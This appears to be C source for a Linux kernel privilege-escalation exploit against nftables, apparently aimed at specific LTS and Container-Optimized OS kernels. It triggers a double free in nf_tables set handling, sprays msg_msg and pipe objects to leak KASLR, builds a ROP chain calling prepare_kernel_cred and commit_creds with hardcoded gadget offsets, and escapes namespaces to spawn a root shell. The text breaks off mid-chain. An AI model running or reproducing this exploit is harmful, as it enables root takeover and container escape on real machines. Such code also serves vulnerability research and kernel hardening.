// for 6.1.31 LTS instance // for cos-105-17412.101.17 instance // for 6.1.0 LTS mitigation instance #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define NOCG_TARGET_SET_SIZE 0x258 // for kmalloc-cg-1k slab #define CG_TARGET_SET_SIZE 0x180 // for kmalloc-cg-512 slab #define NORMAL_SET_SIZE 0x158 // original set size #define CG_MSG_MSG_SIZE 0x200 #define MSG_MSG_SPRAY_CNT 0x800 #define KEY_SPRAY_CNT 10 #define PIPE_SPRAY_CNT 0x800 #define TARGET_COMM 0xdeadbeefcafebabe #define RECLAIM_SET_NAME "set_reclaim" #define mnl_batch_limit (1024 * 1024) char mnl_batch_buffer[2 * mnl_batch_limit]; struct msgp { long mtype; char mtext[1]; }; struct kernel_gadget { char *version; // flag for exploit caches int is_netfilter_cg; // KASLR leak related value uintptr_t anon_pipe_buf_ops_offset; uintptr_t nft_set_ops_offset; // task_struct related offsets uintptr_t init_task_offset; uintptr_t init_nsproxy_offset; uintptr_t init_cred_offset; uintptr_t init_fs_offset; // helpher function uintptr_t set_memory_x_offset; uintptr_t find_task_by_vpid_offset; uintptr_t switch_task_namespaces_offset; uintptr_t prepare_kernel_cred_offset; uintptr_t commit_creds_offset; uintptr_t msleep_offset; // ROP gadgets // pop rdi ; ret uintptr_t pop_rdi_ret_offset; // pop rsi ; ret uintptr_t pop_rsi_ret_offset; // pop rcx ; ret uintptr_t pop_rcx_ret_offset; uintptr_t ret2user_gadget_offset; // push rax ; jmp qword ptr [rsi - 0x7f] uintptr_t push_rax_jmp_qptr_rsi_7f_offset; // push rsi ; jmp qword ptr [rsi + 0x39] uintptr_t pivot_gadget_cg_1_offset; // pop rsp ; ret uintptr_t pivot_gadget_cg_2_offset; // push rdi ; jmp qword ptr [rsi + 0x39] uintptr_t pivot_gadget_nocg_1_offset; // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff81004130 (nop ; ret) uintptr_t pivot_gadget_nocg_2_offset; // add rsp, 0xc8 ; jmp 0xffffffff82204200 (ret) uintptr_t pivot_gadget_nocg_3_offset; }; struct kernel_gadget gadgets[] = { { .version = "5.15.109+", // cos-105 instance .is_netfilter_cg = 0, .nft_set_ops_offset = 0xffffffff828b4720, .init_task_offset = 0xffffffff83215940, .init_nsproxy_offset = 0xffffffff83261ee0, .init_cred_offset = 0xffffffff83262120, .init_fs_offset = 0xffffffff833980a0, .set_memory_x_offset = 0xffffffff8107e740, .find_task_by_vpid_offset = 0xffffffff810f5300, .switch_task_namespaces_offset = 0xffffffff810fdc00, .msleep_offset = 0xffffffff8116c1c0, .pop_rdi_ret_offset = 0xffffffff81081610, .pop_rsi_ret_offset = 0xffffffff811441ea, .pivot_gadget_nocg_1_offset = 0xffffffff818a9405, .pivot_gadget_nocg_2_offset = 0xffffffff810041cb, .pivot_gadget_nocg_3_offset = 0xffffffff81a6d804, }, { .version = "6.1.31+", // lts instance .is_netfilter_cg = 1, .anon_pipe_buf_ops_offset = 0xffffffff82a057c0, .init_task_offset = 0xffffffff83615a40, .init_nsproxy_offset = 0xffffffff83662a40, .find_task_by_vpid_offset = 0xffffffff8110b730, .switch_task_namespaces_offset = 0xffffffff811132e0, .prepare_kernel_cred_offset = 0xffffffff81115030, .commit_creds_offset = 0xffffffff81114d50, .pop_rdi_ret_offset = 0xffffffff81082fd0, .pop_rsi_ret_offset = 0xffffffff811e7f5e, .pop_rcx_ret_offset = 0xffffffff811080e3, .push_rax_jmp_qptr_rsi_7f_offset = 0xffffffff818b5486, .ret2user_gadget_offset = (0xffffffff82201090 + 0x99), .pivot_gadget_cg_1_offset = 0xffffffff818d557b, .pivot_gadget_cg_2_offset = 0xffffffff811cc910, }, { .version = "6.1.0+", // lts mitigation instance .is_netfilter_cg = 1, .anon_pipe_buf_ops_offset = 0xffffffff82a04ac0, .init_task_offset = 0xffffffff836159c0, .init_nsproxy_offset = 0xffffffff83661680, .find_task_by_vpid_offset = 0xffffffff8110a0d0, .switch_task_namespaces_offset = 0xffffffff81111c80, .prepare_kernel_cred_offset = 0xffffffff811139d0, .commit_creds_offset = 0xffffffff811136f0, .pop_rdi_ret_offset = 0xffffffff8102764d, .pop_rsi_ret_offset = 0xffffffff810fb7dd, .pop_rcx_ret_offset = 0xffffffff811e3633, .push_rax_jmp_qptr_rsi_7f_offset = 0xffffffff818aaa46, .ret2user_gadget_offset = (0xffffffff82201090 + 0x99), .pivot_gadget_cg_1_offset = 0xffffffff818ca79b, .pivot_gadget_cg_2_offset = 0xffffffff81404820, }, }; struct kernel_gadget *curr_gadget = &gadgets[0]; struct kernel_gadget *init_gadget(void) { struct utsname buf; if (uname(&buf) < 0) { perror("uname"); exit(-1); } printf("[*] current kernel release : %s\n", buf.release); for (int i = 0; i < sizeof(gadgets) / sizeof(struct kernel_gadget); i++) { if (!strcmp(gadgets[i].version, buf.release)) { printf("[+] this version is supproted by this exploit\n"); curr_gadget = &gadgets[i]; return &gadgets[i]; } } return NULL; } void init_msgq(int *msgq_arr, size_t cnt) { for (size_t i = 0; i < cnt; i++) if ((msgq_arr[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) < 0) perror("msgget"); } int send_msg(int msgqid, char *data, size_t size, long mtype) { struct msgp *m = malloc(sizeof(long) + size); int ret = -1; memcpy(m->mtext, data, size); m->mtype = mtype; ret = msgsnd(msgqid, m, size, 0); free(m); return ret; } void spray_msgsnd(int *msgq_arr, size_t spray_size, size_t cache_size, char *data, size_t iter, long mtype) { for (size_t i = 0; i < spray_size; i++) for (size_t j = 0; j < iter; j++) { if (msgq_arr[i] < 0) continue; if (send_msg(msgq_arr[i], data, cache_size - 48, mtype) < 0) perror("msgsnd"); } return; } void release_msg(int *msgq_arr, size_t spray_size) { int ret; char msg_buf[0x2000]; struct msgp *msg = (struct msgp *)msg_buf; for (size_t i = 0; i < spray_size; i++) { if (msgq_arr[i] < 0) continue; memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgq_arr[i], msg, sizeof(msg_buf) - 1, 0, IPC_NOWAIT); if (ret < 0) perror("msgrcv"); } } typedef int32_t key_serial_t; static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { return syscall(__NR_add_key, type, description, payload, plen, ringid); } static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5); } unsigned long cs; unsigned long rsp; unsigned long ss; unsigned long rflags; static void save_state() { asm( "movq %%cs, %0\n" "movq %%ss, %1\n" "pushfq\n" "popq %2\n" "movq %%rsp, %3\n" : "=r"(cs), "=r"(ss), "=r"(rflags), "=r"(rsp) : : "memory"); } void replace(unsigned char *data, uint64_t datasz, uintptr_t key, uintptr_t repl) { for (unsigned char *data_end = data + datasz - 8; data < data_end; data++) { if (*(uintptr_t *)data == key) { *(uintptr_t *)data = repl; } } } void unshare_setup(uid_t uid, gid_t gid) { int temp; char edit[0x100]; unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET); temp = open("/proc/self/setgroups", O_WRONLY); write(temp, "deny", strlen("deny")); close(temp); temp = open("/proc/self/uid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", uid); write(temp, edit, strlen(edit)); close(temp); temp = open("/proc/self/gid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", gid); write(temp, edit, strlen(edit)); close(temp); return; } void set_cpu_affinity(int cpu_n, pid_t pid) { cpu_set_t *set = malloc(sizeof(cpu_set_t)); CPU_ZERO(set); CPU_SET(cpu_n, set); if (sched_setaffinity(pid, sizeof(set), set) < 0) { perror("sched_setaffinity"); return; } free(set); } uint32_t family = NFPROTO_INET; char *spray_table_name = "spray_table"; char *exploit_table_name = "exploit_table"; char *spray_chain_name = "OUTPUT"; char *exploit_chain_name = "OUTPUT"; static void create_table(struct mnl_nlmsg_batch *batch, uint32_t seq, char *table_name) { struct nftnl_table *table = nftnl_table_alloc(); if (table == NULL) { errx(1, "Cannot into nftnl_table_alloc()"); } nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, family); nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name); struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq); nftnl_table_nlmsg_build_payload(nlh, table); mnl_nlmsg_batch_next(batch); nftnl_table_free(table); } static void create_set(struct mnl_nlmsg_batch *batch, uint32_t seq, char *table_name, char *set_name, uint32_t set_id, uint32_t set_flags, uint32_t set_key_len, uint32_t set_desc_size, void *set_userdata, uint32_t set_userdata_len) { struct nftnl_set *set = nftnl_set_alloc(); if (set == NULL) { errx(1, "Cannot into nftnl_set_alloc()"); } nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); nftnl_set_set_u32(set, NFTNL_SET_ID, set_id); nftnl_set_set_u32(set, NFTNL_SET_FLAGS, set_flags); nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, set_key_len); if (set_desc_size != 0) { nftnl_set_set_u32(set, NFTNL_SET_DESC_SIZE, set_desc_size); } if (set_userdata != NULL) { nftnl_set_set_data(set, NFTNL_SET_USERDATA, set_userdata, set_userdata_len); } struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE | NLM_F_ACK, seq); nftnl_set_nlmsg_build_payload(nlh, set); mnl_nlmsg_batch_next(batch); nftnl_set_free(set); } static void delete_set(struct mnl_nlmsg_batch *batch, uint32_t seq, uint32_t family, char *table_name, char *set_name) { struct nftnl_set *set = nftnl_set_alloc(); if (set == NULL) { errx(1, "Cannot into nftnl_set_alloc()"); } nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, NFPROTO_INET, NLM_F_ACK, seq); nftnl_set_nlmsg_build_payload(nlh, set); mnl_nlmsg_batch_next(batch); nftnl_set_free(set); } static void create_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, char *table_name, char *chain_name) { struct nftnl_chain *chain = nftnl_chain_alloc(); if (chain == NULL) { errx(1, "Cannot into nftnl_chain_alloc()"); } nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, family); nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name); nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq); nftnl_chain_nlmsg_build_payload(nlh, chain); mnl_nlmsg_batch_next(batch); nftnl_chain_free(chain); } static void create_lookup_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, char *table_name, char *chain_name, char *set_name, int set_id) { struct nftnl_rule *rule = nftnl_rule_alloc(); if (rule == NULL) { errx(1, "Cannot into nftnl_rule_alloc()"); } nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name); nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); struct nftnl_expr *lookup = nftnl_expr_alloc("lookup"); if (lookup == NULL) { errx(1, "Cannot into nftnl_expr_alloc()"); } nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1); nftnl_expr_set_str(lookup, NFTNL_EXPR_LOOKUP_SET, set_name); nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SET_ID, set_id); nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_FLAGS, 0); nftnl_rule_add_expr(rule, lookup); struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, seq); nftnl_rule_nlmsg_build_payload(nlh, rule); mnl_nlmsg_batch_next(batch); nftnl_rule_free(rule); } static void create_faulty_lookup_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, char *table_name, char *chain_name, char *set_name, int set_id) { struct nftnl_expr *lookup1, *lookup2; struct nftnl_rule *rule; rule = nftnl_rule_alloc(); if (rule == NULL) { errx(1, "Cannot into nftnl_rule_alloc()"); } nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name); nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); lookup1 = nftnl_expr_alloc("lookup"); if (lookup1 == NULL) { errx(1, "Cannot into nftnl_expr_alloc()"); } // for release nftnl_expr_set_u32(lookup1, NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1); nftnl_expr_set_str(lookup1, NFTNL_EXPR_LOOKUP_SET, set_name); nftnl_expr_set_u32(lookup1, NFTNL_EXPR_LOOKUP_SET_ID, set_id); nftnl_expr_set_u32(lookup1, NFTNL_EXPR_LOOKUP_FLAGS, 0); nftnl_rule_add_expr(rule, lookup1); lookup2 = nftnl_expr_alloc("lookup"); if (lookup2 == NULL) { errx(1, "Cannot into nftnl_expr_alloc()"); } // for fault nftnl_expr_set_u32(lookup2, NFTNL_EXPR_LOOKUP_SREG, 0); nftnl_expr_set_str(lookup2, NFTNL_EXPR_LOOKUP_SET, set_name); nftnl_expr_set_u32(lookup2, NFTNL_EXPR_LOOKUP_SET_ID, set_id); nftnl_expr_set_u32(lookup2, NFTNL_EXPR_LOOKUP_FLAGS, 0); nftnl_rule_add_expr(rule, lookup2); struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, seq); nftnl_rule_nlmsg_build_payload(nlh, rule); mnl_nlmsg_batch_next(batch); nftnl_rule_free(rule); } static void prepare_nftables(struct mnl_socket *nl) { uint32_t portid, seq, table_seq; int ret; seq = time(NULL); struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); table_seq = seq; mnl_nlmsg_batch_next(batch); // table for spray create_table(batch, seq++, spray_table_name); create_chain(batch, seq++, spray_table_name, spray_chain_name); // table for exploit create_table(batch, seq++, exploit_table_name); create_chain(batch, seq++, exploit_table_name, exploit_chain_name); nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); mnl_nlmsg_batch_next(batch); portid = mnl_socket_get_portid(nl); if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { err(1, "Cannot into mnl_socket_sendto()"); } mnl_nlmsg_batch_stop(batch); while (table_seq + 1 != seq) { ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); if (ret == -1) { err(1, "Cannot into mnl_socket_recvfrom()"); } ret = mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); if (ret == -1) { err(1, "Cannot into mnl_cb_run()"); } table_seq++; } } static void prepare_reclaim_set(struct mnl_socket *nl, char *set_name, size_t size) { uint32_t portid, seq, table_seq; int ret; char udata_buf[0x1000]; seq = time(NULL); struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); table_seq = seq; mnl_nlmsg_batch_next(batch); // set for reclaimation memset(udata_buf, 0, size); create_set(batch, seq++, spray_table_name, set_name, 1, 0, 1, 0, udata_buf, size - NORMAL_SET_SIZE); nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); mnl_nlmsg_batch_next(batch); portid = mnl_socket_get_portid(nl); if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { err(1, "Cannot into mnl_socket_sendto()"); } mnl_nlmsg_batch_stop(batch); } static void release_reclaim_set(struct mnl_socket *nl, char *set_name) { uint32_t portid, seq, table_seq; int ret; seq = time(NULL); struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); table_seq = seq; mnl_nlmsg_batch_next(batch); // set for reclaimation delete_set(batch, seq++, family, spray_table_name, set_name); nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); mnl_nlmsg_batch_next(batch); portid = mnl_socket_get_portid(nl); if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { err(1, "Cannot into mnl_socket_sendto()"); } mnl_nlmsg_batch_stop(batch); } static void trigger_uaf(struct mnl_socket *nl, size_t size) { uint32_t portid, seq, table_seq; struct mnl_nlmsg_batch *batch; int ret; char exploit_set_name[0x100]; char *udata_buf[0x1000]; seq = time(NULL); batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); table_seq = seq; mnl_nlmsg_batch_next(batch); memset(exploit_set_name, 'A', sizeof(exploit_set_name)); memset(udata_buf, 0, size); exploit_set_name[sizeof(exploit_set_name) - 1] = '\x00'; // Trigger Alloc A -> Alloc B -> ... (on nf_tables_newset) create_set(batch, seq++, exploit_table_name, "a", 0x13100, NFT_SET_ANONYMOUS, 1, 0, udata_buf, size - NORMAL_SET_SIZE); create_set(batch, seq++, exploit_table_name, "b", 0x13101, NFT_SET_ANONYMOUS, 1, 0, udata_buf, size - NORMAL_SET_SIZE); // ... Free A -> Free B -> ... (on nf_tables_newrule -> nf_tables_rule_destroy) create_faulty_lookup_rule(batch, seq++, exploit_table_name, exploit_chain_name, "a", 0x13100); create_faulty_lookup_rule(batch, seq++, exploit_table_name, exploit_chain_name, "b", 0x13100); create_lookup_rule(batch, seq++, exploit_table_name, exploit_chain_name, "a", 0x13100); // ... Free A -> Free B (on nf_tables_abort_release -> nft_set_destroy) nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); mnl_nlmsg_batch_next(batch); portid = mnl_socket_get_portid(nl); if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { err(1, "Cannot into mnl_socket_sendto()"); } mnl_nlmsg_batch_stop(batch); } void post_exploit(void) { printf("[+] exploit success!!\n"); // spin the parent if (fork()) { for (;;) ; } // move to safe cpu // to prevent access to corrupted freelist set_cpu_affinity(1, 0); sleep(1); // escape pid/mount/network namespace setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); printf("[+] now drop the shell\n"); // drop root shell execlp("/bin/bash", "/bin/bash", NULL); exit(0); } int main_cg(int argc, char **argv) { struct mnl_socket *nl; char msg_buf[0x2000]; char buf[0x2000]; struct msgp *msg = (struct msgp *)msg_buf; int ret; int msgqids1[3]; int msgqids2[MSG_MSG_SPRAY_CNT]; int msgqid3; int pipefd[PIPE_SPRAY_CNT][2]; init_msgq(msgqids1, 3); init_msgq(&msgqid3, 1); // for prevent accessing corrupted freelist // ...and for objects to leak // 1k -> TARGET_CACHE (512) // (for struct pipe_buf) -> (for reclaim) init_msgq(msgqids2, MSG_MSG_SPRAY_CNT); // defragmentation spray_msgsnd(msgqids2, MSG_MSG_SPRAY_CNT, 0x400, buf, 1, 2); spray_msgsnd(msgqids2, MSG_MSG_SPRAY_CNT, CG_MSG_MSG_SIZE, buf, 1, 2); release_msg(msgqids2, MSG_MSG_SPRAY_CNT); release_msg(msgqids2, MSG_MSG_SPRAY_CNT); memset(buf, 0, CG_MSG_MSG_SIZE); // 1k-sized msg_msg is special // it needs to be identified for control unaligned msg_msg // thus, mark the beginn and end of msg content // ...and let just avoid vary first QWORD since it's used by msg_msgseg->next for (int i = 0; i < MSG_MSG_SPRAY_CNT; i++) { memset(buf, 0, 0x400); *(uintptr_t *)(buf + 8) = i; *(uintptr_t *)(buf + 0x400 - 48 - 8) = i; if (send_msg(msgqids2[i], buf, 0x400 - 48, 1) < 0) perror("msgsnd"); } memset(buf, 0, CG_MSG_MSG_SIZE); spray_msgsnd(msgqids2, MSG_MSG_SPRAY_CNT, CG_MSG_MSG_SIZE, buf, 1, 2); // make some room for double freed chunks for (size_t i = 10; i < 12; i++) { memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids2[i], msg, sizeof(msg_buf), 2, IPC_NOWAIT); if (ret < 0) err(1, "msgrcv"); } nl = mnl_socket_open(NETLINK_NETFILTER); if (nl == NULL) { err(1, "Cannot into mnl_socket_open()"); } if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { err(1, "Cannot into mnl_socket_bind()"); } // setup table and chains printf("[*] prepare table and chain...\n"); prepare_nftables(nl); printf("[*] now trigger UAF...\n"); trigger_uaf(nl, CG_TARGET_SET_SIZE); // spary msg_msg with unique types for (int i = 0; i < 3; i++) { memset(buf, 0, CG_MSG_MSG_SIZE); if (msgqids1[i] < 0) continue; if (send_msg(msgqids1[i], buf, CG_MSG_MSG_SIZE - 48, i + 1) < 0) perror("msgsnd"); } // and check duplicate int key1, key2; memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids1[0], msg, sizeof(msg_buf), 0, IPC_NOWAIT | MSG_COPY); if (ret < 0) perror("msgrcv"); key1 = msg->mtype; memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids1[2], msg, sizeof(msg_buf), 0, IPC_NOWAIT | MSG_COPY); if (ret < 0) perror("msgrcv"); key2 = msg->mtype; if (key1 != key2) { err(1, "fail to get double free..."); } printf("[+] we have duplicated msg_msg! : %d, %d, %d\n", key1, key2, ret); // free the overlapping one and reclaim it with msg_msgseg memset(buf, 0, sizeof(buf)); uintptr_t buf_ptr = (uintptr_t)buf - 48; // write the fake size *(uintptr_t *)(buf_ptr + 0x1000) = 0; // mlist.prev *(uintptr_t *)(buf_ptr + 0x1000 + 8) = 2; // m_type *(uintptr_t *)(buf_ptr + 0x1000 + 0x10) = 0x1000 - 48; // m_ts (PG_SIZE - sizeof(struct msg_msg)) *(uintptr_t *)(buf_ptr + 0x1000 + 0x18) = 0; // next *(uintptr_t *)(buf_ptr + 0x1000 + 0x20) = 0; // security ret = msgrcv(msgqids1[2], msg, sizeof(msg_buf) - 1, 0, IPC_NOWAIT | MSG_NOERROR); if (ret < 0) perror("msgrcv"); // PG_SIZE - sizeof(struct msg_msg) - TARGET_SIZE - sizeof(struct msg_msgseg) if (send_msg(msgqid3, buf, 0x1000 + (CG_MSG_MSG_SIZE - 0x10) - 48 - 8, 1) < 0) perror("msgsnd"); memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids1[0], msg, 0x1000 - 48, 0, IPC_NOWAIT | MSG_COPY); if (ret < 0) perror("msgrcv"); uintptr_t small_msg_msg_addr = -1; printf("[*] overlapped by msg_msgseg : size %d\n", ret); uintptr_t *payload = (uintptr_t *)msg->mtext; // candidate offsets by spray layout // iterate through size of msg_msg for (size_t i = 0x1d0 / 8; i < ret / 8; i += 64) { if (payload[i] && payload[i + 1]) { small_msg_msg_addr = payload[i + 1]; break; } } if (small_msg_msg_addr == -1) { err(1, "fail to leak msg_msg..."); } printf("[+] 1k-sized msg_msg addr : 0x%llx\n", small_msg_msg_addr); // re-reclaim with msg_msgseg to trigger free of 64-sized msg_msg printf("[+] re-reclaim for 1k slab leak!\n"); memset(buf, 0, sizeof(buf)); buf_ptr = (uintptr_t)buf - 48; // write the fake size *(uintptr_t *)(buf_ptr + 0x1000) = 0; // mlist.prev *(uintptr_t *)(buf_ptr + 0x1000 + 8) = 2; // m_type *(uintptr_t *)(buf_ptr + 0x1000 + 0x10) = 0x1100; // m_ts *(uintptr_t *)(buf_ptr + 0x1000 + 0x18) = small_msg_msg_addr + 0x400 - 48; // msg_msg->data + 0x400 - 48 == msg_msgseg! // PG_SIZE - sizeof(struct msg_msg) - TARGET_SIZE - sizeof(struct msg_msgseg) memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqid3, msg, 1, 1, IPC_NOWAIT | MSG_NOERROR); if (ret < 0) perror("msgrcv"); if (send_msg(msgqid3, buf, 0x1000 + (CG_MSG_MSG_SIZE - 0x10) - 48 - 8, 1) < 0) perror("msgsnd"); // we have leak now // populate the lk-sized cg cache to prevent crash for (size_t i = 20; i < MSG_MSG_SPRAY_CNT; i++) { memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids2[i], msg, sizeof(msg_buf), 2, IPC_NOWAIT); if (ret < 0) err(1, "msgrcv"); } int upper_msg_msg_holder = -1; int lower_msg_msg_holder = -1; memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids1[0], msg, sizeof(msg_buf), 0, IPC_NOWAIT | MSG_COPY); if (ret < 0) perror("msgrcv"); printf("[*] overlapped by msg_msgseg again : size %d\n", ret); payload = (uintptr_t *)msg->mtext; // for(size_t i = 0; i < ret / 8; i ++){ // printf("%d : 0x%llx\n", i, payload[i]); // } if (payload[510] && payload[510] < MSG_MSG_SPRAY_CNT) { upper_msg_msg_holder = msgqids2[payload[510]]; printf("[*] 1k-sized upper msg_msg is holded by %dth msgq (msgq %d)\n", payload[510], upper_msg_msg_holder); // remove from spray list msgqids2[payload[510]] = -1; } if (payload[518] && payload[518] < MSG_MSG_SPRAY_CNT) { lower_msg_msg_holder = msgqids2[payload[518]]; printf("[*] 1k-sized lower msg_msg is holded by %dth msgq (msgq %d)\n", payload[518], lower_msg_msg_holder); // remove from spray list msgqids2[payload[518]] = -1; } if (upper_msg_msg_holder == -1 || lower_msg_msg_holder == -1) { err(1, "fail to leak unaligned msg_msg..."); } // release the lower msg_msg and spray pipe_buf memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(lower_msg_msg_holder, msg, sizeof(msg_buf), 0, IPC_NOWAIT); if (ret < 0) perror("msgrcv"); for (int i = 0; i < 0x100; i++) { if (pipe(pipefd[i]) < 0) err(1, "pipe()"); write(pipefd[i][1], "aaaaaaaa", 8); } // leak the kalsr slide with anon_pipe_buf_ops leak uintptr_t kaslr_slide = -1; uintptr_t anon_pipe_buf_ops_addr = -1; memset(msg_buf, 0, sizeof(msg_buf)); ret = msgrcv(msgqids1[0], msg, sizeof(msg_buf), 0, IPC_NOWAIT | MSG_COPY); if (ret < 0) perror("msgrcv"); payload = (uintptr_t *)msg->mtext; // for(size_t i = 500; i < ret / 8; i ++){ // printf("%d : 0x%llx\n", i, payload[i]); // } anon_pipe_buf_ops_addr = payload[513]; if ((anon_pipe_buf_ops_addr & 0xfff) != (curr_gadget->anon_pipe_buf_ops_offset & 0xfff)) { err(1, "fail to leak kaslr..."); } printf("[+] anon_pipe_buf_ops_addr : %p\n", anon_pipe_buf_ops_addr); kaslr_slide = anon_pipe_buf_ops_addr - curr_gadget->anon_pipe_buf_ops_offset; printf("[+] kaslr slide : %p\n", kaslr_slide); // now release the upper msg_msg and overwrite the pipe_ops memset(buf, 0, sizeof(buf)); buf_ptr = (uintptr_t)buf; // write the fake pipe_buffer /* struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; }; */ uintptr_t pipe_buffer_addr = small_msg_msg_addr + 0x400; *(uintptr_t *)(buf_ptr) = curr_gadget->pivot_gadget_cg_2_offset + kaslr_slide; // page *(uintptr_t *)(buf_ptr + 8) = pipe_buffer_addr + 0x50; // offset / len *(uintptr_t *)(buf_ptr + 0x10) = pipe_buffer_addr + 0x18; // ops *(uintptr_t *)(buf_ptr + 0x20) = curr_gadget->pivot_gadget_cg_1_offset + kaslr_slide; // ops->release *(uintptr_t *)(buf_ptr + 0x39) = curr_gadget->pivot_gadget_cg_2_offset + kaslr_slide; // ...and write the ROP payload uintptr_t *gadget_start = (uintptr_t *)(buf_ptr + 0x50); int idx = 0; // rax = prepare_kernel_cred(&init_task); gadget_start[idx++] = curr_gadget->pop_rdi_ret_offset + kaslr_slide; gadget_start[idx++] = curr_gadget->init_task_offset + kaslr_slide; gadget_start[idx++] = curr_gadget->prepare_kernel_cred_offset + kaslr_slide; // commit_creds(rax); gadget_start[idx++] = curr_gadget->pop_rsi_ret_offset + kaslr_slide; gadget_start[idx++] = pipe_buffer_addr + 0x200 + 0x7f; gadget_start[idx++] = curr_gadget->push_rax_jmp_qptr_rsi_7f_offset + kaslr_slide; gadget_start[idx++] = curr_gadget->commit_creds_offset + kaslr_slide; // rax = find_task_by_vpid(1) gadget_start[idx++] = curr_gadget->pop_rdi_ret_offset + kaslr_slide; gadget_start[idx++] = 1; gadget_start[idx++] = curr_gadget->find_task_by_vpid_offset + kaslr_slide; // switch_task_namespaces(rax, &init_namespace); gadget_start[idx++] = curr_gadget->pop_rsi_ret_offset + kaslr_slide; gadget_start[idx++] = pipe_buffer_addr + 0x200 + 0x7f; gadget_start[idx++] = curr_gadget->push_rax_jmp_qptr_rsi_7f_offset + kaslr_slide; gadget_start[idx++] = curr_gadget->pop_rsi_ret_offset + kaslr_slide; 